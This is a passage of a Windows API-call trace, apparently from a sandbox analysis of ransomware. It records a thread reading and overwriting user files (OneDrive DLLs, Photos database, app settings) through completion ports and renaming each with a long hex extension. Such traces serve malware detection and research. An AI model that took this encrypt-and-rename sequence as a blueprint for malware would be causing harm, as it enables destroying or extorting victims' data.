0x898 Thread: id = 3 os_tid = 0x9a0 Thread: id = 4 os_tid = 0x9b0 Thread: id = 5 os_tid = 0x9b8 Thread: id = 117 os_tid = 0xe2c [0091.019] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0112.941] WriteFile (in: hFile=0x328, lpBuffer=0x3310430*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32f02f8 | out: lpBuffer=0x3310430*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32f02f8) returned 1 [0112.943] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0112.945] NtQueryObject (in: Handle=0x328, ObjectInformationClass=0x1, ObjectInformation=0x32f03a8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x32f03a8, ReturnLength=0x24fff70) returned 0x0 [0112.945] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSyncShell.dll", lpString2=".728FD58CB848A40BDED818521CA328D09505D52DD94CE3EBC9FA89D8AA4B6835" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSyncShell.dll.728FD58CB848A40BDED818521CA328D09505D52DD94CE3EBC9FA89D8AA4B6835") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSyncShell.dll.728FD58CB848A40BDED818521CA328D09505D52DD94CE3EBC9FA89D8AA4B6835" [0112.945] GetProcessHeap () returned 0x600000 [0112.945] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x170) returned 0x315bef0 [0112.945] NtSetInformationFile (FileHandle=0x328, IoStatusBlock=0x24fff60, FileInformation=0x315bef0, Length=0x170, FileInformationClass=0xa) returned 0x0 [0112.949] CloseHandle (hObject=0x328) returned 1 [0112.949] GetProcessHeap () returned 0x600000 [0112.949] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x32f02f8 | out: hHeap=0x600000) returned 1 [0112.950] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0112.951] WriteFile (in: hFile=0x310, lpBuffer=0x30e82d8*, nNumberOfBytesToWrite=0x1600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0) returned 1 [0112.952] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0113.522] WriteFile (in: hFile=0x32c, lpBuffer=0x31130f8*, nNumberOfBytesToWrite=0x7200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 1 [0113.525] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0113.550] ReadFile (in: hFile=0x318, lpBuffer=0x32c0180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x32a0048 | out: lpBuffer=0x32c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x32a0048) returned 1 [0113.550] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0113.551] WriteFile (in: hFile=0x318, lpBuffer=0x32c0180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32a0048 | out: lpBuffer=0x32c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32a0048) returned 1 [0113.551] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0113.552] NtQueryObject (in: Handle=0x318, ObjectInformationClass=0x1, ObjectInformation=0x32a00f8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x32a00f8, ReturnLength=0x24fff70) returned 0x0 [0113.552] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSyncSessions.dll", lpString2=".4929DBF7CCB91FDEF42EF28F4AA3936B880EF96891BED881AA54D27A53E5A104" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSyncSessions.dll.4929DBF7CCB91FDEF42EF28F4AA3936B880EF96891BED881AA54D27A53E5A104") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSyncSessions.dll.4929DBF7CCB91FDEF42EF28F4AA3936B880EF96891BED881AA54D27A53E5A104" [0113.552] GetProcessHeap () returned 0x600000 [0113.553] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x176) returned 0x318aec0 [0113.553] NtSetInformationFile (FileHandle=0x318, IoStatusBlock=0x24fff60, FileInformation=0x318aec0, Length=0x176, FileInformationClass=0xa) returned 0x0 [0113.556] CloseHandle (hObject=0x318) returned 1 [0113.556] GetProcessHeap () returned 0x600000 [0113.556] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x32a0048 | out: hHeap=0x600000) returned 1 [0113.557] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0114.153] ReadFile (in: hFile=0x318, lpBuffer=0x3310430, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x32f02f8 | out: lpBuffer=0x3310430*, lpNumberOfBytesRead=0x0, lpOverlapped=0x32f02f8) returned 1 [0114.153] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0114.153] WriteFile (in: hFile=0x318, lpBuffer=0x3310430*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32f02f8 | out: lpBuffer=0x3310430*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32f02f8) returned 1 [0114.154] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0114.155] NtQueryObject (in: Handle=0x318, ObjectInformationClass=0x1, ObjectInformation=0x32f03a8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x32f03a8, ReturnLength=0x24fff70) returned 0x0 [0114.155] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install-PerUser_2021-02-11_134548_958-b14.log", lpString2=".D8ABC8A32E4E791ACBA8C67699ACEA2C9329113C1647CFFAF9A36DBA0D87D221" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install-PerUser_2021-02-11_134548_958-b14.log.D8ABC8A32E4E791ACBA8C67699ACEA2C9329113C1647CFFAF9A36DBA0D87D221") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install-PerUser_2021-02-11_134548_958-b14.log.D8ABC8A32E4E791ACBA8C67699ACEA2C9329113C1647CFFAF9A36DBA0D87D221" [0114.155] GetProcessHeap () returned 0x600000 [0114.155] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x19c) returned 0x6b07b8 [0114.155] NtSetInformationFile (FileHandle=0x318, IoStatusBlock=0x24fff60, FileInformation=0x6b07b8, Length=0x19c, FileInformationClass=0xa) returned 0x0 [0114.156] CloseHandle (hObject=0x318) returned 1 [0114.156] GetProcessHeap () returned 0x600000 [0114.156] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x32f02f8 | out: hHeap=0x600000) returned 1 [0114.157] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0114.158] WriteFile (in: hFile=0x330, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0114.160] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0119.147] WriteFile (in: hFile=0x328, lpBuffer=0x3310430, nNumberOfBytesToWrite=0x5800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32f02f8 | out: lpBuffer=0x3310430, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32f02f8) returned 0x0 [0119.147] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0119.151] NtQueryObject (in: Handle=0x328, ObjectInformationClass=0x1, ObjectInformation=0x32f03a8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x32f03a8, ReturnLength=0x24fff70) returned 0x0 [0119.151] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt", lpString2=".D21F91F938C507CF31DF21D9556479847C18C9D13CF3AD263506E976476B9025" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt.D21F91F938C507CF31DF21D9556479847C18C9D13CF3AD263506E976476B9025") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt.D21F91F938C507CF31DF21D9556479847C18C9D13CF3AD263506E976476B9025" [0119.151] GetProcessHeap () returned 0x600000 [0119.151] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x23e) returned 0x3185720 [0119.152] NtSetInformationFile (FileHandle=0x328, IoStatusBlock=0x24fff60, FileInformation=0x3185720, Length=0x23e, FileInformationClass=0xa) returned 0x0 [0119.153] CloseHandle (hObject=0x328) returned 1 [0119.153] GetProcessHeap () returned 0x600000 [0119.153] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x32f02f8 | out: hHeap=0x600000) returned 1 [0119.154] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0119.156] WriteFile (in: hFile=0x318, lpBuffer=0x30e82d8, nNumberOfBytesToWrite=0x4a00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0) returned 0x0 [0119.156] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0119.159] NtQueryObject (in: Handle=0x318, ObjectInformationClass=0x1, ObjectInformation=0x30c8250, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x30c8250, ReturnLength=0x24fff70) returned 0x0 [0119.159] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt", lpString2=".093A33599ECB4AC9064C784A0F1760D32301B84CA79EC77FD9CD4F73B4ED8C04" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt.093A33599ECB4AC9064C784A0F1760D32301B84CA79EC77FD9CD4F73B4ED8C04") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt.093A33599ECB4AC9064C784A0F1760D32301B84CA79EC77FD9CD4F73B4ED8C04" [0119.159] GetProcessHeap () returned 0x600000 [0119.159] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x23e) returned 0x3183e08 [0119.160] NtSetInformationFile (FileHandle=0x318, IoStatusBlock=0x24fff60, FileInformation=0x3183e08, Length=0x23e, FileInformationClass=0xa) returned 0x0 [0119.160] CloseHandle (hObject=0x318) returned 1 [0119.161] GetProcessHeap () returned 0x600000 [0119.161] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0119.162] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0119.556] WriteFile (in: hFile=0x338, lpBuffer=0x690478, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 0x0 [0119.559] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0119.559] NtQueryObject (in: Handle=0x338, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x24fff70) returned 0x0 [0119.560] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\MediaDb.v1.sqlite", lpString2=".C33DAC0F714DC1EBB0C6DE5648DDFDFABA0E0B76FD59BE2097AF859ABB40DC7C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\MediaDb.v1.sqlite.C33DAC0F714DC1EBB0C6DE5648DDFDFABA0E0B76FD59BE2097AF859ABB40DC7C") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\MediaDb.v1.sqlite.C33DAC0F714DC1EBB0C6DE5648DDFDFABA0E0B76FD59BE2097AF859ABB40DC7C" [0119.560] GetProcessHeap () returned 0x600000 [0119.560] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x19e) returned 0x6b0610 [0119.560] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x24fff60, FileInformation=0x6b0610, Length=0x19e, FileInformationClass=0xa) returned 0x0 [0119.562] CloseHandle (hObject=0x338) returned 1 [0119.562] GetProcessHeap () returned 0x600000 [0119.563] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0119.563] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0119.563] WriteFile (in: hFile=0x324, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0119.564] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0119.705] WriteFile (in: hFile=0x324, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0119.708] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0119.754] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x24fff70) returned 0x0 [0119.755] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings\\settings.dat", lpString2=".25EEFC414E7DCB6BA4F68FFD5AFB9A59D9D422740FF46942DD292DB8B738187B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings\\settings.dat.25EEFC414E7DCB6BA4F68FFD5AFB9A59D9D422740FF46942DD292DB8B738187B") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings\\settings.dat.25EEFC414E7DCB6BA4F68FFD5AFB9A59D9D422740FF46942DD292DB8B738187B" [0119.755] GetProcessHeap () returned 0x600000 [0119.755] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1b2) returned 0x30f3c60 [0119.755] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x24fff60, FileInformation=0x30f3c60, Length=0x1b2, FileInformationClass=0xa) returned 0x0 [0119.757] CloseHandle (hObject=0x320) returned 1 [0119.757] GetProcessHeap () returned 0x600000 [0119.757] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0119.759] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0119.942] WriteFile (in: hFile=0x31c, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0119.971] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0120.148] WriteFile (in: hFile=0x324, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0120.152] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0120.291] NtQueryObject (in: Handle=0x324, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x24fff70) returned 0x0 [0120.292] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\microsoft.windowscommunicationsapps_17.6308.42271.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat", lpString2=".F14261E1F072C5BB2445D1F3710EF4B292BD3F7590DECC182A11F28BBB3B0A75" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\microsoft.windowscommunicationsapps_17.6308.42271.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.F14261E1F072C5BB2445D1F3710EF4B292BD3F7590DECC182A11F28BBB3B0A75") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\microsoft.windowscommunicationsapps_17.6308.42271.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.F14261E1F072C5BB2445D1F3710EF4B292BD3F7590DECC182A11F28BBB3B0A75" [0120.292] GetProcessHeap () returned 0x600000 [0120.292] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x250) returned 0x311ae10 [0120.295] NtSetInformationFile (FileHandle=0x324, IoStatusBlock=0x24fff60, FileInformation=0x311ae10, Length=0x250, FileInformationClass=0xa) returned 0x0 [0120.297] CloseHandle (hObject=0x324) returned 1 [0120.297] GetProcessHeap () returned 0x600000 [0120.297] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0120.297] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0120.302] ReadFile (in: hFile=0x320, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0120.302] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0120.303] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x24fff70) returned 0x0 [0120.304] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings\\settings.dat", lpString2=".F6DF98670DE706C8370E750CDB5D3705ED9434C08AA04E2F1DC406B497BA485B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings\\settings.dat.F6DF98670DE706C8370E750CDB5D3705ED9434C08AA04E2F1DC406B497BA485B") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings\\settings.dat.F6DF98670DE706C8370E750CDB5D3705ED9434C08AA04E2F1DC406B497BA485B" [0120.304] GetProcessHeap () returned 0x600000 [0120.304] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1a6) returned 0x62d2e8 [0120.304] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x24fff60, FileInformation=0x62d2e8, Length=0x1a6, FileInformationClass=0xa) returned 0x0 [0120.307] CloseHandle (hObject=0x320) returned 1 [0120.307] GetProcessHeap () returned 0x600000 [0120.307] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0120.310] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0120.374] ReadFile (in: hFile=0x324, lpBuffer=0x690478, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0120.375] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, 